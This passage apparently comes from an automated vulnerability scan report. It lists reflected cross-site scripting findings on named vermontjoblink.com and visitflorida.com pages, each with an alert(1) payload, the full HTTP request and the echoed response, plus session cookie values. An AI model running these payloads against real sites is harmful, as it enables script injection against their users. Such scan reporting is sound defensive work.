PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_quicksearch_dsp.cfm?rand=493049&amp;type=e5572d"><a>89daaddf139&amp;choice=2">
...[SNIP]...

3.155. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [reg%5Ftype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the reg%5Ftype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47a3"style%3d"x%3aexpression(alert(1))"fb321437520 was submitted in the reg%5Ftype parameter. This input was echoed as f47a3"style="x:expression(alert(1))"fb321437520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=emf47a3"style%3d"x%3aexpression(alert(1))"fb321437520 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:23 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:14:23'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="regType" value="emf47a3"style="x:expression(alert(1))"fb321437520" class="cfTransparent" />
...[SNIP]...

3.156. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm [def parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The value of the def request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a was submitted in the def parameter. This input was echoed as 9ef0e"style="x:expression(alert(1))"f93f40cde7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/mn_warn_dsp.cfm?def=false9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:26 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="DEF_prev" value="false9ef0e"style="x:expression(alert(1))"f93f40cde7a" />
...[SNIP]...

3.157. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [FormID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45 was submitted in the FormID parameter. This input was echoed as 8ec4e"style="x:expression(alert(1))"d56a86a0e45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=48ec4e"style%3d"x%3aexpression(alert(1))"d56a86a0e45&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:32:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMID_prev" value="48ec4e"style="x:expression(alert(1))"d56a86a0e45" />
...[SNIP]...

3.158. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [rand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d686"style%3d"x%3aexpression(alert(1))"e87098b543f was submitted in the rand parameter. This input was echoed as 3d686"style="x:expression(alert(1))"e87098b543f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on&FormID=4&rand=4616363d686"style%3d"x%3aexpression(alert(1))"e87098b543f HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:34:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="4616363d686"style="x:expression(alert(1))"e87098b543f" />
...[SNIP]...

3.159. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm [securitysys parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08 was submitted in the securitysys parameter. This input was echoed as 3f014"style="x:expression(alert(1))"bc3565a5b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ada/services/schools/schsearch.cfm?securitysys=on3f014"style%3d"x%3aexpression(alert(1))"bc3565a5b08&FormID=4&rand=461636 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:30:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="SECURITYSYS_prev" value="on3f014"style="x:expression(alert(1))"bc3565a5b08" />
...[SNIP]...

3.160. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /facebook_logged_in.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88952"-alert(1)-"319b7ec6502 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook_logged_in.php88952"-alert(1)-"319b7ec6502 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 162341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
+ sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/facebook_logged_in.php88952"-alert(1)-"319b7ec6502";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.161. http://www.visitflorida.com/facebook_logged_in.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /facebook_logged_in.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7b3e'-alert(1)-'bdf8821e492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook_logged_in.phpe7b3e'-alert(1)-'bdf8821e492 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 162316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oascentral.visitflorida.com/RealMedia/ads/';
OAS_sitepage = 'www.VISITFLORIDA.com/facebook_logged_in.phpe7b3e'-alert(1)-'bdf8821e492home';
OAS_listpos = 'Middle1,Bottom,Right,x07,x08,x09,x10,x11,x12,x13,x14';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 11;
OAS_rn = '
...[SNIP]...

3.162. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /florida_vacation_auction/auction_details.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8367e"-alert(1)-"b0be0104df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /florida_vacation_auction8367e"-alert(1)-"b0be0104df4/auction_details.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/florida_vacation_auction8367e"-alert(1)-"b0be0104df4/auction_details.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&r
...[SNIP]...

3.163. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /florida_vacation_auction/auction_details.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a65c"-alert(1)-"d69575a4d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /florida_vacation_auction/auction_details.php2a65c"-alert(1)-"d69575a4d7 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
       target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/florida_vacation_auction/auction_details.php2a65c"-alert(1)-"d69575a4d7";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.164. http://www.visitflorida.com/floridalive [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94549"-alert(1)-"cff8ca947d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /floridalive94549"-alert(1)-"cff8ca947d0 HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:04:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=gbl4cbv6pbr6skk7epjos56om6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
